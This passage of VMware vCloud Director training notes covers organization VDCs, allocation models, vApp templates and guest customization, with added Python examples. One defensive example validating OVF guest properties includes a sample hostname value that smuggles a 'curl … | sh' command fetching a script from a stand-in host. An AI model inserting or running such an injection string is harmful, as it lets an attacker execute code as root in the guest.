• The cloud consumer or user sees the organization VDCs but not the underlying provider VDCs.

Organization VDCs and Provider VDCs (Slide 5-24)

• Each organization can have multiple organization VDCs.
• Each organization VDC can use resources from a single provider VDC.
• Multiple organization VDCs can use resources from the same provider VDC.
• You cannot create an organization VDC until a provider VDC exists.

[Figure: organization VDCs VDC-A-1, VDC-A-2, VDC-B-1, VDC-B-2, and VDC-C-1 belonging to organizations A, B, and C, drawing on the Gold, Silver, and Bronze provider VDCs]


You must create your provider VDCs before you can create your organization VDCs. Each organization can have multiple organization VDCs. Each organization VDC can be connected to only one provider VDC, but each provider VDC can serve resources to multiple organization VDCs.

Like a provider VDC, the organization VDC is a container for resources, but the way that resources are allocated from an organization VDC can be specified. A network pool can be added to an organization VDC with limits on the number of networks that can be created. You can also specify the maximum amount of storage that the organization VDC can consume.

The organization VDC inherits availability characteristics from the provider VDC to which it belongs.

Allocation Models (Slide 5-25)

• Each organization is created based on an allocation model.
• The allocation model controls how that organization will be allowed to consume resources.
• You can choose from three models: pay-as-you-go, allocation pool, and reservation pool.
• Each organization can be created with only one model.


When creating an organization VDC, choosing an appropriate allocation model is important. The allocation model not only determines how the provider VDC resources are committed to the organization VDCs, but also how the provider bills the customer for those resources.

Pay-As-You-Go Model (Slide 5-26)


The pay-as-you-go model is the easiest model to understand and administer. The easiest way to think of pay-as-you-go is that customers pay for what they get. When a vApp powers on, the resources are committed. If a vApp is not powered on, then the customer is not billed for resources.

Even though the customer is billed as soon as a vApp is powered on, only a percentage of the resources are guaranteed. If you want to create a high-tier service offering, the pay-as-you-go model is where the provider can increase the guaranteed resources.

The pay-as-you-go model is the only model where you can specify the speed of virtual CPUs in the vApp.

The pay-as-you-go model has these characteristics:

• Requires no up-front resource allocation.
• Resources are committed only when users create vApps in the organization VDC.
• You can set limits to cap usage.
• You can also specify a percentage of resources to guarantee, which allows you to overcommit resources.

Allocation Pool Model (Slide 5-27)


The allocation pool model configures a virtual container of resources.

The allocation pool model allocates a subset of resources, but it guarantees to a tenant only a percentage of what has been allocated. Thus, the provider has the ability to overcommit resources when using the allocation pool model.

The allocation pool model has these characteristics:

• Only a percentage of the allocated resources are committed to the organization VDC.
• You can specify the percentage, which allows you to overcommit resources.
• Advanced resource management controls, such as shares and reservations, are managed by the cloud operator. These types of control allow for more coherent resource management across organizations.

Reservation Pool Model (Slide 5-28)


The reservation pool model configures a physical container of resources. Think of this model as a model where the customer “rents hardware for their exclusive use.”

The reservation pool model should be the most expensive allocation model offered to customers. The customer is in complete control of the resources that they use, and all resources are guaranteed.

The reservation pool model also offers customers the greatest amount of control. They have the same controls that a vSphere administrator would have over resource pool settings. Thus, overcommitment is possible, but it is controlled by the customer.

The reservation pool model has these characteristics:

• All allocated resources are immediately committed to the organization VDC.
• One hundred percent of all resources specified are guaranteed.
• No other organization can share these resources.
• Organization administrators can use advanced vSphere resource management controls, such as shares and reservations, to manage overcommitment of resources between their workloads.

Organization VDC Allocation Model Comparison (Slide 5-29)

Pay-as-you-go:

• Resources are committed to the virtual machine on virtual machine creation in the organization VDC.
• Provider-controlled overcommitment per virtual machine. Easiest to manage, good starting point.

Allocation pool:

• Capacity is reserved for the organization VDC, with the ability for provider-controlled overcommitment for the entire organization VDC.

Reservation pool (special case allocation pool):

• All provider VDC resources that you allocate are committed to the organization VDC.

[Figure: for each model, the vApps in the organization VDC against actual usage, guarantee, and overcommit range; caption: The pool expands to accommodate resources reserved on demand.]


Reservation pool (continued):

• Tenant-controlled overcommitment for the entire organization VDC.

Virtual Machine Admission Control (Slide 5-30)

Pay-as-you-go:

• CPU- and memory-based admission control: virtual machines cannot be deployed to a pay-as-you-go VDC unless enough CPU and RAM are available to meet the reservation requirements for the virtual machine.

Allocation pool:

• Memory-based admission control: virtual machines cannot be deployed to an allocation pool VDC unless enough RAM is available to meet the reservation requirements for the virtual machine.

Reservation pool:

• No admission control: all virtual machine deployments will be completed. Resource contention and starvation must be managed by the tenant.


When choosing an allocation model, you should consider virtual machine admission control. Admission control is whether a VMware vSphere® Distributed Resource Scheduler™ cluster allows a virtual machine to be powered on and is based on available resources. The allocation models directly affect how admission control is used in the vSphere DRS cluster.
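The three allocation models and the admission-control behaviour of slides 5-25 to 5-30, worked through as a small simulator. This is an added example, not vCloud Director or vSphere code: the OrgVdc and Vm classes, the capacity figures, and the reservation arithmetic (guarantee percentage of each VM's configured CPU and memory, checked against what the organization VDC can still reserve) are a constructed simplification of what DRS actually does.

```python
"""Admission control for the three organization VDC allocation models, modelled as
a simulator. Added example, not vCloud Director code; the classes and figures are
constructed and the reservation arithmetic is a simplification."""
from dataclasses import dataclass

PAY_AS_YOU_GO = "pay-as-you-go"
ALLOCATION_POOL = "allocation-pool"
RESERVATION_POOL = "reservation-pool"


@dataclass
class OrgVdc:
    model: str
    cpu_mhz: float           # CPU the organization VDC can still reserve for its VMs
    memory_mb: float         # memory the organization VDC can still reserve for its VMs
    guarantee_pct: float     # percentage of each VM's resources that is guaranteed
    cpu_reserved_mhz: float = 0.0
    mem_reserved_mb: float = 0.0


@dataclass
class Vm:
    name: str
    vcpus: int
    vcpu_mhz: float          # vCPU speed; only pay-as-you-go lets the provider set this
    memory_mb: float


def reservation_for(vdc, vm):
    """Reservation a VM needs when powered on: the guaranteed share of its CPU and
    memory. A reservation pool guarantees everything, so its VMs reserve 100%."""
    pct = 100.0 if vdc.model == RESERVATION_POOL else vdc.guarantee_pct
    return vm.vcpus * vm.vcpu_mhz * pct / 100.0, vm.memory_mb * pct / 100.0


def admit(vdc, vm):
    """Decide whether vm may be deployed to vdc. Returns (admitted, reason).

    pay-as-you-go   : CPU- and memory-based admission control
    allocation pool : memory-based admission control only
    reservation pool: no admission control; contention is the tenant's to manage
    """
    cpu_need, mem_need = reservation_for(vdc, vm)
    cpu_fits = vdc.cpu_reserved_mhz + cpu_need <= vdc.cpu_mhz
    mem_fits = vdc.mem_reserved_mb + mem_need <= vdc.memory_mb

    if vdc.model == RESERVATION_POOL:
        admitted, reason = True, "no admission control"
    elif vdc.model == ALLOCATION_POOL:
        admitted = mem_fits
        reason = "memory reservation fits" if mem_fits else "insufficient memory for reservation"
    elif vdc.model == PAY_AS_YOU_GO:
        admitted = cpu_fits and mem_fits
        if admitted:
            reason = "CPU and memory reservations fit"
        else:
            reason = "insufficient " + " and ".join(
                name for name, ok in (("CPU", cpu_fits), ("memory", mem_fits)) if not ok)
    else:
        raise ValueError(f"unknown allocation model {vdc.model!r}")

    if admitted:
        # The reservation is committed only once the VM is admitted.
        vdc.cpu_reserved_mhz += cpu_need
        vdc.mem_reserved_mb += mem_need
    return admitted, reason


def deploy_all(vdc, vms):
    """Deploy VMs in order and return the names of those that were admitted."""
    return [vm.name for vm in vms if admit(vdc, vm)[0]]
```

Running the same VM list through a pay-as-you-go, an allocation pool, and a reservation pool VDC shows the practical difference: the first two refuse deployments once guaranteed resources run out (on CPU or memory for pay-as-you-go, on memory alone for allocation pool), while the reservation pool admits everything and leaves contention to the tenant's own resource pool settings.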

Organization VDC Best Practices (Slide 5-31)

• When creating organization VDCs, VMware® recommends that you do not mix allocation models in a provider VDC.
• Mixing resource allocation models in the provider VDC across organizations can result in unpredictable resource consumption, making SLA management difficult.
• Enable thin provisioning to reduce storage consumption by committing resources only on demand.
• Enable fast provisioning to enable the use of vSphere linked clones.


An organization VDC requires storage space for vApps and vApp templates. You can allocate storage from the space available on provider VDC datastores.

Thin provisioning can help prevent overallocating storage and save storage space. For a virtual machine with a thin virtual disk, VMware® ESXi™ provisions the entire space required for the disk’s current and future activities. ESXi commits only as much storage space as the disk needs for its initial operations.

Fast provisioning saves time by using vSphere linked clones for certain operations.

Fast provisioning requires VMware® vCenter Server™ 5.0 or later and ESXi 5.0 or later hosts. If the provider VDC on which the organization VDC is based contains any ESX/ESXi 4.x hosts, you must disable fast provisioning. If the provider VDC on which the organization VDC is based contains any VMware vSphere® VMFS datastores connected to more than 32 hosts, powering on virtual machines might fail. Make sure that datastores are connected to a maximum of 32 hosts.
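A pre-flight check for the two conditions the notes above attach to fast provisioning: no ESX/ESXi 4.x host in the provider VDC, and no VMFS datastore connected to more than 32 hosts. This is an added example, not vCloud Director code; the inventory dictionaries and the host and datastore names are constructed, and the version strings are assumed to be plain dotted numbers as a host inventory would report them.

```python
"""Pre-flight checks for enabling fast provisioning on an organization VDC.
Added example, not vCloud Director code; inventory structures are constructed."""

MAX_HOSTS_PER_DATASTORE = 32   # more than this and powering on VMs might fail


def _major_version(version):
    """'5.0.0' -> 5; version strings are assumed to come from the host inventory."""
    return int(version.split(".")[0])


def fast_provisioning_allowed(host_versions):
    """Fast provisioning (linked clones) needs every host in the provider VDC to be
    ESXi 5.0 or later; any ESX/ESXi 4.x host means it must be disabled."""
    return all(_major_version(v) >= 5 for v in host_versions.values())


def oversubscribed_datastores(datastore_hosts):
    """Datastores connected to more than MAX_HOSTS_PER_DATASTORE distinct hosts."""
    return sorted(ds for ds, hosts in datastore_hosts.items()
                  if len(set(hosts)) > MAX_HOSTS_PER_DATASTORE)


def provider_vdc_preflight(host_versions, datastore_hosts):
    """Findings that must be resolved before fast provisioning is enabled on an
    organization VDC backed by this provider VDC. Empty list means clear."""
    findings = []
    old_hosts = sorted(h for h, v in host_versions.items() if _major_version(v) < 5)
    if old_hosts:
        findings.append("disable fast provisioning: ESX/ESXi 4.x hosts present: "
                        + ", ".join(old_hosts))
    for ds in oversubscribed_datastores(datastore_hosts):
        findings.append(f"datastore {ds} is connected to more than "
                        f"{MAX_HOSTS_PER_DATASTORE} hosts")
    return findings
```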

Organization VDCs and Networking (Slide 5-32)

• Organization networks and organization edge gateways are part of organization VDCs.
• When you create an organization VDC, you have the opportunity to create networks and gateways. You can add networks and gateways after the organization VDC has been created.
• Organization networks and organization gateways can be shared with other organization VDCs in the organization.


The networking module discussed organization VDC networks in detail. Typically most organizations have these requirements:

• An edge gateway device that connects to an external network
• A routed organization VDC network

In the most basic scenario, an organization topology is defined by an edge gateway connecting to an external network and a single organization VDC network. vApp networks are routed and connect to the single organization VDC network.

For the organization VDC network, you must provide a range of IP addresses and associated network information. Because an organization VDC network is a private network, you can use RFC 1918 addresses for DHCP and static IP address pools. Typically, a full RFC 1918 class C is used for the private network IP pool.

You can create an edge gateway in either a compact or a full configuration. The full configuration provides increased capacity and performance. The compact configuration requires less memory and fewer compute resources. All services are supported in either configuration. You can enable either configuration for high availability, which enables automatic failover of the edge gateway device to a backup instance that is running on a separate virtual machine.

Considerations for Organization VDC Networking (Slide 5-33)

• Most organizations require a minimum of one edge gateway that connects to an external network.
• Most organizations require at least one organization VDC network.
• Use a logical naming convention to identify networks for ease of management. Example: <organization_name>-<network_name_or_purpose>
• Each organization VDC has a single network pool. A system administrator selects the pool and stipulates the quota.
• Select compact or full configuration for edge gateways based on traffic demands.
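A validation pass over a proposed organization VDC network that applies the points made on the two networking slides above: RFC 1918 addressing for the private network, a gateway and static/DHCP pools that sit inside the subnet and do not collide, the <organization_name>-<network_name_or_purpose> naming convention, and the network pool quota. This is an added example, not vCloud Director code; the function names, the (first, last) pool representation, and the sample addresses are constructed for illustration, and the example generalizes the slide's single naming example to a check that can be run over any proposal.

```python
"""Sanity checks for a proposed organization VDC network. Added example, not
vCloud Director code; function names and sample values are constructed."""
import ipaddress

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(cidr):
    """True when the whole IPv4 subnet lies inside one of the RFC 1918 private ranges."""
    network = ipaddress.ip_network(cidr, strict=False)
    return network.version == 4 and any(network.subnet_of(p) for p in RFC1918)


def follows_naming_convention(org_name, network_name):
    """<organization_name>-<network_name_or_purpose>, with a non-empty purpose."""
    prefix = org_name + "-"
    return network_name.startswith(prefix) and len(network_name) > len(prefix)


def _check_pool(label, pool, network, problems):
    """Parse an inclusive (first, last) pool, record problems, return its bounds."""
    start, end = ipaddress.ip_address(pool[0]), ipaddress.ip_address(pool[1])
    if start > end:
        problems.append(f"{label} pool starts at {start} but ends at {end}")
    if start not in network or end not in network:
        problems.append(f"{label} pool {start}-{end} is not inside {network}")
    return start, end


def check_org_vdc_network(org_name, network_name, cidr, gateway, static_pool,
                          dhcp_pool=None, networks_in_use=0, quota=None):
    """Return a list of problems with the proposed network; an empty list means it
    passes every check. Pools are (first, last) address strings, inclusive."""
    problems = []
    if not follows_naming_convention(org_name, network_name):
        problems.append(f"{network_name!r} does not follow {org_name}-<purpose>")

    network = ipaddress.ip_network(cidr, strict=False)
    if not is_rfc1918(str(network)):
        problems.append(f"{network} is not an RFC 1918 private range")

    gw = ipaddress.ip_address(gateway)
    if gw not in network:
        problems.append(f"gateway {gw} is outside {network}")

    static_start, static_end = _check_pool("static", static_pool, network, problems)
    if static_start <= gw <= static_end:
        problems.append(f"gateway {gw} lies inside the static pool")

    if dhcp_pool is not None:
        dhcp_start, dhcp_end = _check_pool("DHCP", dhcp_pool, network, problems)
        if dhcp_start <= gw <= dhcp_end:
            problems.append(f"gateway {gw} lies inside the DHCP pool")
        if static_start <= dhcp_end and dhcp_start <= static_end:
            problems.append("static and DHCP pools overlap")

    # Each organization VDC draws on a single network pool whose quota the system
    # administrator stipulates; creating one more network must stay within it.
    if quota is not None and networks_in_use + 1 > quota:
        problems.append(f"network pool quota of {quota} networks is exhausted")
    return problems
```

Overlapping pools and a gateway address inside a pool are the two mistakes that produce duplicate-address symptoms on a tenant network, so the check reports them separately rather than stopping at the first problem.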


Lab 4: Configuring VMware vCloud Director Organizations (Slide 5-34)

Configure vCloud Director organizations


Review of Learner Objectives (Slide 5-35)

You should be able to meet the following objectives:

• Create an organization virtual data center (VDC)
• Configure organization VDC networking


Lesson 3: vApp Templates (Slide 5-36)


Learner Objectives (Slide 5-37)

By the end of this lesson, you should be able to meet the following objectives:

• Install the Client Integration Plug-In into the VMware vSphere® Client
• Upload a virtual machine into vSphere from a local OVF template
• Import a virtual machine from vSphere as a vApp template
• Upload a virtual machine into vCloud Director from a local OVF template


vApp Templates (Slide 5-38)

• A vCloud Director virtual appliance (vApp) template is a predefined package of virtual machines and networks that you can use to rapidly instantiate vCloud Director vApps.
• Install and preconfigure guest operating systems in the vApp template.
• Preconfigure networks in the vApp template.
• You cannot power on a vApp template.

[Figure: a vApp template and the vApp instantiated from it]


A vApp template is a virtual machine image that is loaded with an operating system, applications, and data. These templates ensure that virtual machines are consistently configured across an entire organization.

You can create a vApp template by importing a virtual machine from the vSphere DRS cluster or from a vApp in the data center, or by uploading a file that uses the Image Transfer Service. If vApp templates are not in Open Virtualization Format (OVF) format, they are converted to OVF format immediately. You can use the vCloud Director import functions to import a vSphere virtual machine to vCloud Director as either a vApp or a vApp template. But to import a VMware vSphere® vApp™ to vCloud Director, you must export it from vSphere in OVF format, then upload the exported OVF to vCloud Director. Only system administrators can import a virtual machine from vCenter Server to vCloud Director.

A vApp template is an immutable vApp because it cannot be deployed and so cannot be powered on. You create a vApp instance from the vApp template that can be deployed and powered on.

Populating Catalogs (Slide 5-39)

Options for adding media to a catalog:

• Upload an ISO or FLP image file.
• Import a media file from a vSphere datastore.*
• Copy or move a media file from one catalog to another.

Options for adding vApp templates to a catalog:

• Upload an Open Virtualization Format (OVF) package.
• Import a virtual machine from vSphere.*
• Copy or move a vApp template from one catalog to another.
• Create a vApp from a template, modify it, and save it as a template.
• Create a vApp from the beginning and save it as a template.

* Requires system administrator permissions


vCloud Director offers several ways to populate catalogs with vApp templates and media. These options are available based on user roles and their associated rights. For example, only system administrators can import a virtual machine or media file from vSphere.

Importing vApp Templates (Slide 5-40)

vSphere virtual machines can be imported into vCloud Director:

• Only the vCloud Director system administrator role has the right to upload a vSphere virtual machine into vCloud Director.
• Virtual machines can be uploaded into a catalog as vApp templates or into My Cloud as vApps.

OVF templates can be uploaded into a catalog as a vApp template:

• OVF templates can also be uploaded as a vApp.
• Any organization user with sufficient rights can upload OVF templates.
• Uploading templates removes any reliance on a system administrator to interact with vSphere.


You can deploy an OVF template in vSphere and then import the resulting virtual machine as a vApp (in My Cloud) or vApp template in an organization catalog. Only the system administrator can interact with vSphere to deploy the OVF template and then import the virtual machine.

Not all vSphere OVF templates can be imported directly into vCloud Director. vSphere supports some items in the template that vCloud Director does not support. A workaround is to open the file with a text editor and remove the items that vCloud Director does not support. Most of these items are related to custom settings.

A user with sufficient privilege can upload an OVF template that is stored on their desktop computer to an organization catalog as a vApp template.

Chain-Length Problems (1) (Slide 5-41)

• Each time a vApp is deployed from a vApp template, a linked clone is created.
• Linked clones are disk-deduplicated copies of the vApp template. These copies are based on vSphere snapshots. Only the data unique to this vApp is stored separately.
• Only 31 linked-clone copies of a vApp can exist. Then a new shadow virtual machine is created for each virtual machine in the vApp and a new chain is started.
• A large number of linked clones can slow performance.
• Only the vCloud Director system administrator can see the chain length of a virtual machine and issue a command to consolidate.
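The chain-length mechanics described on this slide, worked through as an accounting model: each deployment takes a linked clone from the template's current parent disk, the 31st clone on a chain triggers a shadow virtual machine that starts a fresh chain, and the system administrator's consolidate action collapses a VM's delta chain. This is an added example, not vCloud Director code: the VirtualMachine and TemplateVm classes, the clone naming, and the way chain length is derived (parent's length plus one) are a constructed simplification of the snapshot chains the slide refers to.

```python
"""Linked-clone chain accounting for vApp deployment from a template. Added
example, not vCloud Director code; classes and names are constructed."""
from dataclasses import dataclass, field
from typing import List, Optional

MAX_LINKED_CLONES = 31   # clones per chain before a shadow VM starts a new chain


@dataclass
class VirtualMachine:
    name: str
    parent: Optional["VirtualMachine"] = None   # disk this linked clone was taken from
    chain_length: int = 0                       # delta disks between this VM and a full disk


@dataclass
class TemplateVm:
    """A virtual machine inside a vApp template, tracking what was cloned from it."""
    base: VirtualMachine
    clones: List[VirtualMachine] = field(default_factory=list)
    shadows: List[VirtualMachine] = field(default_factory=list)
    clones_on_current_chain: int = 0

    @property
    def current_parent(self):
        """New clones link from the latest shadow VM, or from the base if none exists."""
        return self.shadows[-1] if self.shadows else self.base


def deploy_from_template(template, vapp_name):
    """Deploy a vApp: take a linked clone from the current parent disk. Once that
    chain holds MAX_LINKED_CLONES clones, create a shadow VM (a full copy, chain
    length 0) and start the next chain from it."""
    if template.clones_on_current_chain >= MAX_LINKED_CLONES:
        shadow = VirtualMachine(f"{template.base.name}-shadow{len(template.shadows) + 1}")
        template.shadows.append(shadow)
        template.clones_on_current_chain = 0
    parent = template.current_parent
    clone = VirtualMachine(f"{vapp_name}/{template.base.name}", parent=parent,
                           chain_length=parent.chain_length + 1)
    template.clones.append(clone)
    template.clones_on_current_chain += 1
    return clone


def deploy_many(template, count, prefix="vapp"):
    """Deploy count vApps in sequence and return the clones created."""
    return [deploy_from_template(template, f"{prefix}-{i}") for i in range(1, count + 1)]


def consolidate(vm):
    """System-administrator action: merge the delta disks so the VM no longer depends
    on its parents. Its chain length drops to 0, so later clones start short chains."""
    vm.parent = None
    vm.chain_length = 0
    return vm


def chain_report(template):
    """Figures the system administrator looks at before deciding to consolidate."""
    longest = max((c.chain_length for c in template.clones),
                  default=template.base.chain_length)
    return {"clones": len(template.clones), "shadows": len(template.shadows),
            "longest_chain": longest}
```

A template that was itself captured from a deployed clone starts with a non-zero chain length, so every vApp deployed from it inherits a longer chain; the report makes that visible, and consolidating the base is what brings subsequent deployments back to short chains.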


Chain-Length Problems (2) (Slide 5-42)

You can see the chain length on the properties of a virtual machine in a template that is stored in a catalog.


Chain-Length Problems (3) (Slide 5-43)

• The command to consolidate is available when you right-click a virtual machine in a template.
• You also can view shadow virtual machines.


Lab 5: Creating VMware vCloud Director vApp Templates (Slide 5-44)

Create vCloud Director vApp templates


Review of Learner Objectives (Slide 5-45)

You should be able to meet the following objectives:

• Install the Client Integration Plug-In into the VMware vSphere® Client
• Upload a virtual machine into vSphere from a local OVF template
• Import a virtual machine from vSphere as a vApp template
• Upload a virtual machine into vCloud Director from a local OVF template


Lesson 4: Building and Publishing vApps (Slide 5-46)


Learner Objectives (Slide 5-47)

By the end of this lesson, you should be able to meet the following objectives:

• Build a vApp
• Publish a vApp to a local organization catalog


vApps (1) (Slide 5-48)

A vApp is a package of IT services. The package includes:

• One or more preconfigured virtual machines running the applications included in a service
• A vApp network for communication between virtual machines
• Metadata for deployment instructions and runtime policies

[Figure: a vApp consisting of an OVF descriptor and three virtual machines: a database virtual machine and two app server virtual machines]


vCloud Director delivers IT services in packages that are called vApps. vApps are composed of one or more virtual machines. These virtual machines communicate over networks included in the package and use resources and services in the deployed environment. The package also includes an OVF descriptor, which provides general application information, hardware requirements, deployment instructions, and policies that are enforced during runtime.

A vCloud vApp is instantiated and consumed in vCloud differently than in a vSphere environment. As discussed earlier, a vApp is a container for a distributed software solution and is the standard unit of deployment in vCloud Director. It has power-on operations, consists of one or more virtual machines, and can be imported or exported as an OVF package. A vCloud vApp might have additional vCloud-specific constructs, such as vApp networks.

vApps are the lowest unit of work in vCloud Director. If a service requires only one virtual machine, you must create a vApp for that virtual machine.

In vCloud Director, you can create a vApp by cloning a template in a catalog or by creating a new one. After you have created the vApp, you can add, remove, or modify the virtual machines in it. vApp property settings enable you to control the behavior of virtual machines when you start and stop the vApp. For example, you can set the order in which the virtual machines power on and off.

vApps (2) (Slide 5-49)

• A vApp is deployed from a vApp template.
• vApps simplify the deployment and ongoing management of an n-tier application.
• vApps can contain one or many virtual machines. vApps encapsulate not only virtual machines but also their interdependencies and resource allocations.
• OVF is the distribution format for vApps.

[Figure: a vApp template and the vApp deployed from it]


You can create a vApp from a vApp template stored in a catalog to which you have access. A vApp in vCloud Director is a logical construct that describes a set of virtual machines.

vApps simplify the deployment and ongoing management of an n-tier application that spans multiple virtual machines by encapsulating those machines in a single virtual service entity. A vApp has the same basic operations as a virtual machine and can contain one or more virtual machines.

vApps encapsulate not only virtual machines but also their interdependencies and resource allocations, which enables single-step power operations, cloning, deployment, and monitoring of the entire application. If a virtual machine is based on an OVF file that includes OVF properties for customization, those properties are retained in the vApp. If any of those properties are user-configurable, you can specify their values in the virtual machine's properties pane after you add it to the vApp.

The distribution format for vApps is OVF, so they can be imported and exported like OVF virtual machines.


vApp Custom Guest Properties (Slide 5-50)

The vApp custom guest properties feature:
• Developers and other users can use OVF descriptors to pass user data into guest operating systems.

Benefits:
• Easier post-deployment configuration and provisioning of identity to virtual machines and vApps
• Provides the functionality to bootstrap a wide variety of guest customization solutions

[Figure: (1) an OVF package is deployed, (2) a deployment configuration is supplied, and (3) the resulting vApp runs on vSphere]


The vApp custom guest properties feature allows users to pass custom data into the guest operating system of vApps deployed in vCloud Director. It is useful to application developers and application owners because the application can be customized by users in ways that go beyond the guest customization available in earlier versions of vCloud Director.

Deploying a custom guest vApp involves the following steps:

1. Template creation by the author:
• The author declares OVF properties in the descriptor.
• The author installs guest software and the scripts that consume those properties.
• The author exports the template as an OVF package.

2. Deployment by the user:
• The user is prompted for deployment-time values.
• The user powers on the vApp.

After steps 1 and 2, vCenter Server generates the OVF environment document containing the supplied values, and the guest scripts read it and customize the software.
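The guest-side half of this procedure, as an added example that is not part of the course or VMware's code: a script reads the OVF environment that vCenter Server generates, extracts the property values, and validates them against an allow-list before anything acts on them. The point a practitioner should take from it is that property values are typed by whoever deployed the vApp and are consumed by scripts that typically run as root in the guest, so they are untrusted input. The example assumes VMware Tools is installed (it exposes the environment as the guestinfo.ovfEnv key); the property names, validation patterns, and the sample document are the example's own, and the sample is constructed to include an injection-shaped hostname.

```python
"""Consume OVF custom properties inside a guest: fetch, parse, validate.

Added example, not course or VMware code. Assumes VMware Tools exposes the
OVF environment via `vmtoolsd --cmd "info-get guestinfo.ovfEnv"`. Property
names and validation rules are this example's own choices.
"""
import re
import subprocess
import xml.etree.ElementTree as ET

OVF_ENV_NS = "http://schemas.dmtf.org/ovf/environment/1"

# Constructed sample of the OVF environment document that vCenter Server
# generates at power-on. The values are whatever the deploying user typed,
# so the hostname below carries a shell-injection attempt.
SAMPLE_OVF_ENV = """<Environment xmlns="http://schemas.dmtf.org/ovf/environment/1"
             xmlns:oe="http://schemas.dmtf.org/ovf/environment/1"
             oe:id="web01">
  <PlatformSection>
    <Kind>VMware ESXi</Kind>
    <Vendor>VMware, Inc.</Vendor>
  </PlatformSection>
  <PropertySection>
    <Property oe:key="hostname" oe:value="web01; curl http://203.0.113.9/x | sh"/>
    <Property oe:key="ntp_server" oe:value="ntp.example.internal"/>
    <Property oe:key="admin_password" oe:value="Tr0ub4dor-and-3"/>
    <Property oe:key="debug_shell" oe:value="true"/>
  </PropertySection>
</Environment>
"""

# Allow-list: only these keys are accepted, and each value must fully match
# its pattern. Anything else is rejected rather than handed to a root shell.
PROPERTY_RULES = {
    "hostname": re.compile(r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"),
    "ntp_server": re.compile(r"[A-Za-z0-9.-]{1,253}"),
    "admin_password": re.compile(r"[\x21-\x7e]{12,64}"),  # printable ASCII, no spaces
}


def read_ovf_env_from_tools() -> str:
    """Ask VMware Tools for the OVF environment (run inside the guest)."""
    return subprocess.run(
        ["vmtoolsd", "--cmd", "info-get guestinfo.ovfEnv"],
        check=True, capture_output=True, text=True,
    ).stdout


def parse_ovf_properties(xml_text: str) -> dict:
    """Return {key: value} for every Property element, namespace-aware."""
    root = ET.fromstring(xml_text)
    props = {}
    for prop in root.iter(f"{{{OVF_ENV_NS}}}Property"):
        key = prop.get(f"{{{OVF_ENV_NS}}}key")
        value = prop.get(f"{{{OVF_ENV_NS}}}value")
        if key is not None and value is not None:
            props[key] = value
    return props


def validate_properties(props: dict):
    """Split properties into accepted values and rejected keys with a reason."""
    accepted, rejected = {}, {}
    for key, value in props.items():
        rule = PROPERTY_RULES.get(key)
        if rule is None:
            rejected[key] = "key not in this template's allow-list"
        elif not rule.fullmatch(value):
            rejected[key] = "value does not match the expected format"
        else:
            accepted[key] = value
    return accepted, rejected


def hostname_command(hostname: str) -> list:
    """Apply a validated value as an argv list, never as a shell string."""
    if not PROPERTY_RULES["hostname"].fullmatch(hostname):
        raise ValueError("refusing unvalidated hostname")
    return ["hostnamectl", "set-hostname", hostname]


if __name__ == "__main__":
    accepted, rejected = validate_properties(parse_ovf_properties(SAMPLE_OVF_ENV))
    print("accepted:", accepted)
    print("rejected:", rejected)
```

Two design points: the parser matches elements and attributes by namespace rather than by the `oe:` prefix, because the prefix is the template author's choice and not guaranteed; and the apply step builds an argv list so that a value which survives validation still never reaches a shell parser. Note also that anything readable through the guestinfo channel is visible to whoever can query VMware Tools inside the guest, so OVF properties are a delivery mechanism for configuration, not a secret store.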

Considerations for vApps (Slide 5-51)

General design considerations:
• Include one virtual CPU. Add vCPUs as needed.
• Use the latest version of VMware® Tools.
• Use default shares, reservations, and limits.
• Use vmxnet3 network adapters.

Network design considerations:
• Each vApp network consumes processor and memory resources and a network from the pool.
• Each VMware® vShield Edge that is deployed allocates an IP address from the static pool available on the organization VDC network.


Be aware of the following general design considerations for vApps:

• Default to one virtual CPU unless requirements call for more. A multithreaded application virtual machine is an example of a need for multiple virtual CPUs.
• Always install the latest version of VMware® Tools™.
• Always provision a 32-bit virtual machine unless a 64-bit virtual machine is required.
• Deploy virtual machines with the default shares, reservations, and limits settings unless you have a clear requirement to do otherwise.
• For virtual network adapters, use VMXNET3 if the guest supports it.
• Secure virtual machines as you would secure physical machines.
• Use standard virtual machine naming conventions.


Lab 6: Building and Publishing VMware vCloud Director vApps (Slide 5-52)

Build and publish vCloud Director vApps.


Review of Learner Objectives (Slide 5-53)

You should be able to meet the following objectives:
• Build a vApp
• Publish a vApp to a local organization catalog


Lesson 5: Deploying and Running vApps (Slide 5-54)


Learner Objectives (Slide 5-55)

By the end of this lesson, you should be able to meet the following objectives:
• Copy a vApp from a public catalog to the local organization catalog
• Deploy a vApp from the local organization catalog
• Configure and start vApps


Guest Customization (Slide 5-58)

• You can configure guest customization settings for any stopped virtual machine.
• Guest customization can be used for the following tasks:
  - Configure the host name
  - Enable or disable SID generation (for Windows guests)
  - Set the administrator password
  - Specify a customization script to be executed
• Guest customization requires a virtual machine reboot to finish.


To ensure that the virtual machines in vApp templates are unique when deployed, vCloud Director lets you customize guests directly from the organization Web console. Customization occurs when the virtual machine is powered on.

vCloud Director can customize the network settings of the guest operating system of a virtual machine created from a vApp template. When you customize the guest operating system, you can create and deploy multiple unique virtual machines based on the same vApp template without machine name or network conflicts.

When you configure a vApp template with the prerequisites for guest customization and add a virtual machine to a vApp based on that template, vCloud Director creates a package containing the guest customization tools. When you deploy and power on the virtual machine for the first time, vCloud Director copies the package into the virtual machine, runs the tools, and then deletes the package from the virtual machine.

Before vCloud Director can perform guest customization on virtual machines with Windows 2000, XP, or 2003 guest operating systems, a VMware vCloud® system administrator must create a corresponding Microsoft Sysprep deployment package in the vCloud Director deployment environment. For more information about creating Sysprep deployment packages, see the vCloud Director Administrator's Guide at www.vmware.com/support/pubs/vcd_pubs.html.

Hardware Customization (1) (Slide 5-59)

• You can change the hardware settings on a stopped virtual machine.
• You might be able to hot-add hardware to running virtual machines.


For each virtual machine in a vApp, you can change the hardware settings. You must hold the vApp Author role or a higher role to update or change the vApp hardware configuration.


Hardware Customization (2) (Slide 5-60)

• You can change the vApp network, create a new vApp network, or connect the vApp directly to an organization VDC network.
• You can specify the IP addressing used by each virtual machine.
• Static IP use requires guest customization to be enabled.


When creating a vApp, preparing a vApp for publication to a catalog, or customizing a vApp for startup, you can change how the vApp connects to the organization infrastructure. vApps typically connect to an organization VDC network, either through a routed vApp network edge or directly. To direct-connect a vApp to an organization VDC network, select the Add network option in the network drop-down menu, and then select one or more existing organization VDC networks to add to the vApp. After you have created or selected the vApp network configuration, you can configure IP parameters.

IP Addresses and vApp Connections (Slide 5-61)

